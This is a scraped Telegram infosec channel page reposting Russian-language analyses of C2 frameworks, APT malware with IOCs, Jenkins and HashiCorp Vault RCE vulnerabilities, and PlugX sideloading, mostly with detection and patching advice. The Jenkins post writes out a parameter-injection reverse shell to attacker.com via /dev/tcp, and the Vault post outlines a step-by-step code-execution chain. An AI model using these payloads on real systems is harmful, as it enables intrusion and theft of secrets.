Available now! Telegram Research 2025 — the year's key insights 
Fsecurity | HH
Open in Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Show more2 020
Subscribers
No data24 hours
-17 days
-1530 days
Posts Archive
2 020
Repost from Похек
Adaptix C2 и Cobalt Strike: сравнительный аналитический обзор для специалистов по кибербезопасности
#adaptix #cobalt #C2 #redteam #IoC
Я учёл последнии комментарии, что контент на канале скатился, поэтому давайте вместе make Poxek great again)
➡️Введение
В современной экосистеме инструментов пост-эксплуатации наблюдается устойчивый тренд: сдвиг от закрытых коммерческих решений к гибким open-source C2-фреймворкам. Если в 2010-х годах доминировали продукты уровня Cobalt Strike и Metasploit Pro, то в середине 2020-х активно появляются проекты нового поколения — такие как Adaptix C2.
➡️Обзор Adaptix C2
▪️Архитектура
Серверная часть: написана на Go, что обеспечивает кроссплатформенность, простоту деплоя и высокую производительность.
- Клиентская часть: Qt/C++ приложение, работающее на Windows, Linux и macOS. Это делает управление C2 доступным с разных ОС, в отличие от ряда конкурентов.
- Модульность: поддержка кастомных агентов и расширений. Ориентация на расширяемость позволяет создавать собственные плагины, команды и интеграции.
▪️Особенности
Open-source модель — прозрачный код облегчает аудит и кастомизацию, но открывает злоумышленникам доступ к функционалу.
- Активное сообщество — развивается быстрее, чем многие закрытые проекты.
- Применимость — используется как в легитимных Red Team-операциях, так и уже фиксируется в реальных инцидентах.
🔗blog.poxek
🌚 @poxek | MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
2 020
Repost from Threat Hunting Father 🦔
+5
👽 Phantom Taurus — NET-STAR: новый «китайский» APT и .NET-IIS бэкдоры
Unit 42 обнаружили новый китайский nexus-APT, обозначенный Phantom Taurus.
🎯 Группа целится в МИДы / посольства, телекомы и госструктуры в регионе Middle East / Africa / Asia и примечательна уникальным набором TTP и собственным .NET-IIS набором — NET-STAR (IIServerCore + AssemblyExecuter v1/v2).
Быстрая картина атак (high-level flow)
• Первичное проникновение — web-shell / уязвимый IIS endpoint (часто OutlookEN.aspx как загрузчик).
• Загрузка в память IIServerCore (fileless) → поддержка динамической загрузки .NET-ассемблей (AssemblyExecuter).
• Пост-эксплуатация — поиск нужной информации: сначала email-theft, в 2025 — сдвиг в сторону целевых SQL-дампов через
mssq.bat и WMI-исполнение.
• Экфильтрация — зашифрованные C2 (AES), память-только payloads, timestomp / изменение дат для сокрытия следов.
🛠️ Основной тулкит (подборка)
• NET-STAR suite: IIServerCore, AssemblyExecuter v1, AssemblyExecuter v2 (v2 — AMSI & ETW bypass).
• Вспомогательные/известные инструменты в наборе TTP: China Chopper, JuicyPotato/SharpEfsPotato, Impacket, Mimikatz, TunnelSpecter, SweetSpecter и др. (см. Appendix A в отчёте).
Что делает NET-STAR (технически)
• IIServerCore — модульный fileless backdoor: загружается через ASPX web-shell (OutlookEN.aspx), держится в w3wp.exe, принимает команды, загружает .NET-assemblies из Base64, выполняет в памяти, шифрует ответ AES, поддерживает timestomp/changeLastModified.
• AssemblyExecuter v1 — in-memory загрузка и исполнение .NET-assemblies (минимальная «шумность» для AV).
AssemblyExecuter v2 — как v1 + методы обхода AMSI/ETW; применение обходов динамически по параметрам.
🐱 Detection & Hunting
• Наличие ASPX-файлов с встроенным Base64-блоком (особенно OutlookEN.aspx или похожие имена).
• w3wp.exe с нетипичной динамической загрузкой .NET-ассемблей (Assembly.Load / Reflection / Invoke), особенно если командный поток содержит STAR-delimited Base64.
• Необычные модификации timestamps (файлы с будущими датами, timestomp).
• Команды на исполнение SQL через WMI (запуски mssq.bat, sqlcmd под контекстом удалённого выполнения).
Hunting tips:
• Фокус — memory only поведения: инструменты типа Sysmon + ETW/Process-Create/ModuleLoad + EDR memory-callbacks помогут увидеть Assembly.Load и динамическое Reflection.
• Коррелируйте ASPX-загрузки с сетевыми запросами к ненормальным C2 и с последующими WMI-вызовами (вспышка wmic process call create / win32_process выполняющие mssq.bat).
Проактивно просканируйте webroot на ASPX с Base64 и сравните SHA/текстовые отпечатки с known-IOCs.
IOCs (средне/высокая степень уверенности)
SHA256:
1. IIServerCore (ServerCore.dll): eeed5530fa1cdeb69398dc058aaa01160eab15d4dcdcd6cb841240987db284dc.
2. AssemblyExecuter V1 (ExecuteAssembly.dll): 3e55bf8ecaeec65871e6fca4cb2d4ff2586f83a20c12977858348492d2d0dec4.
3. AssemblyExecuter V2 (ExecuteAssembly.dll): afcb6289a4ef48bf23bab16c0266f765fab8353d5e1b673bd6e39b315f83676e and b76e243cf1886bd0e2357cbc7e1d2812c2c0ecc5068e61d681e0d5cff5b8e038.
(Добавьте эти SHA в EDR/AV/IOC-feeds; ищите совпадения в внутренней телеметрии.)
Быстрая тактика реагирования (playbook bullets)
• Изолируйте и снимите дамп w3wp.exe при подозрении на in-memory .NET-загрузку.
Соберите веб-корень (ASPX) и сделайте хеши/стринг-анализ (ищем Base64, STAR-delimiter).
• Проверьте WMI-журналы на remote WMI execution и поиск mssq.bat/sql-вызовов.
• Проанализируйте сетевой трафик на AES-зашифрованные POST/GET с нестандартными параметрами и STAR-делимитером.
• Удалите/ресторите компрометированные web-файлы, обновите веб-серверы, примените правила Web Application Firewall для блокировки подозрительных ASPX загрузок.
🔗https://unit42.paloaltonetworks.com/phantom-taurus/
🦔THF2 020
Repost from Похек
CVE-2025-53652: Jenkins под ударом через Git Parameter
#jenkins #devops #dev #git
Command injection в популярном Jenkins Git Parameter Plugin ставит под угрозу DevOps инфраструктуру тысяч организаций. Несмотря на официальную оценку "Medium", исследователи VulnCheck доказали возможность удаленного выполнения кода и компрометации CI/CD пайплайнов.
🪲Суть уязвимости
Git Parameter Plugin не валидирует параметры, передаваемые в build-процессы. Плагин принимает произвольные значения вместо проверки соответствия предложенным вариантам, что позволяет инъекцию команд через Git-параметры.
Затронутые версии: 439.vb_0e46ca_14534 и ранее
Исправлено в: 444.vca_b_84d3703c2
#️⃣Техническая механика атаки
➡️Цепочка эксплуатации
# Нормальный параметр
BRANCH_PARAM = "master"
# Выполняется: git rev-parse --resolve-git-dir /path/master/.git
# Вредоносный параметр
BRANCH_PARAM = "$(sleep 80)"
# Выполняется: git rev-parse --resolve-git-dir /path/$(sleep 80)/.git
# Результат: команда sleep выполняется как дочерний процесс# Reverse shell через curl
curl -kv 'http://jenkins:8080/job/buildName/build' -X POST \
-H 'Cookie: [cookie]' \
--data-urlencode 'Jenkins-Crumb=[crumb]' \
--data-urlencode 'json={"parameter":{"name":"BRANCH_PARAM","value":"$(bash -c \"bash &> /dev/tcp/attacker.com/12700 <&1\")"}}'| Категория | Количество серверов | Риск| |------------------------|---------------------|-------------| | Требуют аутентификации | 100,000+ | Средний | | Открытая регистрация | ~1,000 | Высокий | | Без аутентификации | ~15,000 | Критический |15,000 Jenkins-серверов полностью доступны без аутентификации, что делает RCE возможным "из коробки". ℹ️Требования для эксплуатации ➡️Аутентифицированные атаки - Права Item/Build на целевом проекте - Знание имени build-задачи - Валидная сессия и CSRF-токен ➡️Неаутентифицированные атаки Даже на серверах без аутентификации требуется: - Валидный session cookie - Jenkins-Crumb (CSRF токен) - Имя build-задачи
# Получение необходимых данных
curl -kv http://target:8080/ -o /dev/null # Получить cookie
curl -kv http://target:8080/job/buildName/build -H 'Cookie: [cookie]' | grep "data-crumb-value="# Результат эксплуатации
$ nc -lvnp 1270
Connection received on 172.18.0.3 55664
$ id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
$ cat ~/secrets/master.key
05322ff531f1b52117bf013b2fe77b40dacbc56268d68b9e234216fe825a0073a5c8051181033f630e67c408d58c3ef631e18ba8b8e6722e64d3c1380518e89a91b4256c5c348febceb24ef32f144045ed422dfb4bdc840aca33814989e431aa00db6df7c403da38247324783811d46c6f3caa1f9b1b26d979fff4391249ca8a -Dnet.uaznia.lukanus.hudson.plugins.gitparameter.GitParameterDefinition.allowAnyParameterValue=true
2 020
Repost from purple shift
HashiCorp Vault — мощный opensource-инструмент, предназначенный для хранения, управления и защиты доступа к чувствительным данным: паролям, API-ключам, сертификатам. Он централизует работу с секретами, автоматизирует их выдачу и отзыв, а также обеспечивает тонкий контроль доступа в сложных распределённых инфраструктурах. Взаимодействие с Vault возможно через API, веб-интерфейс или CLI, а аутентификация поддерживает широкий спектр методов, включая интеграцию с Kubernetes и облачными платформами.
Однако... в августе этого года в HashiCorp Vault было обнаружено 9 уязвимостей, одна из которых (CVE-2025-6000) критическая (score 9.1). И это первая в истории публично задокументированная RCE-уязвимость в HashiCorp Vault, просуществовавшая 9 лет до исправления.
Уязвимость позволяет привилегированному оператору Vault создать подконтрольный файл аудита и зарегистрировать его как плагин, чтобы получить возможность выполнения произвольного кода.
Для эксплуатации нужно:
0. Иметь root токен. Его получение выходит за рамки данной статьи, однако стоит упомянуть, что связка нескольких CVE даёт возможность это сделать: CVE-2025-6037 позволяет имперсонироваться через уязвимость проверки сертификатов, CVE-2025-5999 позволяет повысить привилегии до root.
Условие является необходимым, так как для создания аудита и регистрации плагина обычно нужны привилегии root.
1. Определить директорию с плагинами. При попытке загрузить несуществующий файл эндпоинт возвращает сообщение об ошибке, которое содержит полный путь к директории. Достаточно отправить
POST /v1/sys/plugins/catalog/non_existing_nameи в ответ получить
1 error occurred:\n\t* failed to verify plugin plugin \"non_existing_name\" version \"v1.0.0\": extracted artifact directory not found: /home/vault/vault_plugins/non_existing_name_1.0.0_linux_amd64\n\nПолный путь до директории плагинов нужен для записи файла аудита в эту директорию. А запись именно в этот каталог необходима для последующей загрузки файла в качестве плагина. Плагины могут быть загружены только из этой директории. 2. Записать файл аудита в каталог плагинов. Для этого зарегистрировать аудит с такими параметрами:
file_path (путь к файлу аудита) = "/home/vault/vault_plugins/script.sh"
Указывается директория с плагинами из предыдущего шага.
mode (права на файл аудита) = "0755"
Файл аудита должен быть исполняемым (rwxr-xr-x)
prefix (префикс будет добавлен перед каждым логом) = "#!/bin/bash\n(some bash payload)"
Эта часть содержит наш пейлоад. Содержимое префикса будет выполняться при загрузке плагина.
3. Зарегистрировать плагин. Для регистрации плагина необходимо указать его sha256, однако тут есть загвоздка: лог аудита содержит различные временные метки, а также хэшированные данные, предсказать которые практически невозможно. Поэтому для получения точной копии лога аудита, можно предварительно зарегистрировать еще один аудит, транслирующий логи на подконтрольный нам сокет. В этом случае добавляется шаг по удалению аудита с префиксом перед подсчетом sha256.
После регистрации исполняемого файла в качестве плагина, он выполняется от имени пользователя vault.
Как обнаружить эксплуатацию CVE-2025-6000:
1. Корреляция событий из шагов выше явно укажет на попытку эксплуатации:
- Попытка регистрации несуществующего плагина;
- Cоздание аудита с указанием prefix и mode;
- Удаление недавно созданного аудита (также рекомендуем мониторить удаление аудита в принципе, так как это событие само по себе должно вызывать подозрения);
- Регистрация подозрительного плагина.
2. Отслеживайте аномалии в цепочках процессов от vault. Например, запуск скриптов.
Методы защиты:
Уязвимость CVE-2025-6000 исправлена в Vault Community Edition 1.20.1 и Vault Enterprise 1.20.1, 1.19.7, 1.18.12 и 1.16.23.
Поэтому стоит обновиться до этих версий. В исправленных версиях аудит с префиксом требует явного указания в конфигурации vault, а также аудит не может использовать файлы с правами на выполнение (0777, 0755 и т.д.) и не может быть записан в директорию плагинов.2 020
Repost from Threat Hunting Father 🦔
+4
🧩 RainyDay ≈ Turian ≈ PlugX (variant): DLL Search Order Hijacking как общая основа
Cisco Talos описывает кампанию с 2022 года против telecom & manufacturing в Central/South Asia, приводящую к установке кастомного PlugX. Вариант пересекается с RainyDay и Turian: одинаковые законные приложения для DLL sideloading, единая крипто-цепочка XOR → RC4 → RtlDecompressBuffer (LZNT1) и частичный reuse RC4-ключей.
🌎 География и victims
Точные страны: Казахстан (телеком-оператор) и Узбекистан (ранее поражённые цели). В целом — Central & South Asia. Для BackdoorDiplomacy исторически: Africa, Europe, Middle East, Asia.
🎯 Attribution (medium confidence)
Наиболее вероятный актор — Naikon (PlugX-variant использует конфиг-формат RainyDay). Пересечения с BackdoorDiplomacy (Turian): схожие цели, однотипные лоадеры и крипто-примитивы → либо shared tooling/vendor, либо фактически один кластер.
🧪 Infection flow (общая логика)
Законный EXE → DLL search order hijacking (
pc2msupp.dll) → чтение зашифрованного shellcode из соседнего файла → XOR → RC4 → LZNT1 → выполнение.
• RainyDay: s.exe → rdmin.src → self-inject.
• PlugX (variant): KMSEldi.exe → Mcsitesdvisor.afx → self-inject в контекст KMSEldi.exe.
• Turian: wingervlansec.exe → wingervlansec.dat → inject в wabmig.exe или explorer.exe → загрузка configer.dat (Config) и wingervlansec.ini (в т.ч. секция "AntiVir").
🔐 Code & crypto markers
Шеллкод-формат: XOR prelude → RC4 → LZNT1 (RtlDecompressBuffer).
RC4-ключи (reuse между семействами):
8f-2;g=3/c?1wf+c92rv.a — RainyDay / PlugX / Turian;
jfntv\1-m0vt801tyvqaf_)U89chasv` — RainyDay / PlugX;
отдельные ключи у части Turian по сэмплам.
ROL25 additive API hashing; местами Control-Flow Flattening.
PE-аномалия: у распакованных DLL намеренно искажён e_lfanew (невалидное смещение заголовка).
🧵 Dev-артефакты / PDB
Строки указывают на проекты dll-to-shellcode / shellcodeloader, присутствует icmpsh-master (提供网页版); встречались сборки, где MicrosoftEdgeUpdate.exe используется как альтернативный sideload-carrier.
🧿 PlugX (variant) — что важно
Кастомизированный BackDoor.PlugX.38: конфиг в стиле RainyDay, дополнительный XOR для строк; эскалация SeDebugPrivilege/SeTcbPrivilege (строки спрятаны модифицированным TEA); маскировка службы в services.exe; HTTPS для C2; библиотека VTCP 10.12.08; встроенный keylogger (логи активны 2022 → Dec 2024).
🔎 Артефакты и «крючки» для охоты
Carriers (allow-list → alert): KMSEldi.exe, wingervlansec.exe, s.exe (Mobile Popup Application, Quick Heal Technologies, signed).
Соседние файлы/паттерны: pc2msupp.dll + Mcsitesdvisor.afx / rdmin.src / wingervlansec.dat / configer.dat / wingervlansec.ini.
Process lineage: carrier.exe → (self) или → wabmig.exe/explorer.exe (child) + исходящий HTTPS.
Memory heuristics: короткий XOR-пролог → RC4 → RtlDecompressBuffer(LZNT1) вскоре после чтения локального файла; ROL25-хеширование API.
PE-аномалии: DLL с неадекватным e_lfanew после распаковки.
PDB/строки: dlltoshellcode, shellcodeloader_vs2008, icmpsh-master, MicrosoftEdgeUpdate.exe.
🛡 Hardening (quick wins)
Включить SafeDllSearchMode, настроить KnownDLLs, запретить side-by-side DLL в рабочих каталогах критичных приложений.
WDAC/AppLocker: deny для неожиданных DLL рядом с известными EXE; строгие allow-lists для апдейтеров/утилит.
EDR canaries: алерты на RtlDecompressBuffer + RC4-like циклы после чтения локального файла; отдельные правила на запуск KMSEldi.exe / wingervlansec.exe вне «зоны доверия».
Инвентаризация и мониторинг редко используемых «обновляющих» бинарников как потенциальных sideload-carriers.
TL;DR: один loader-скелет (XOR→RC4→LZNT1), общие carriers (KMSEldi.exe / wingervlansec.exe / s.exe), частичный reuse RC4-ключей и единые Dev-артефакты связывают RainyDay, Turian и PlugX(variant) в единую операцию; атрибуция к Naikon — medium confidence, с устойчивыми пересечениями с BackdoorDiplomacy.
🔗 https://blog.talosintelligence.com/how-rainyday-turian-and-a-new-plugx-variant-abuse-dll-search-order-hijacking/
🦔 THF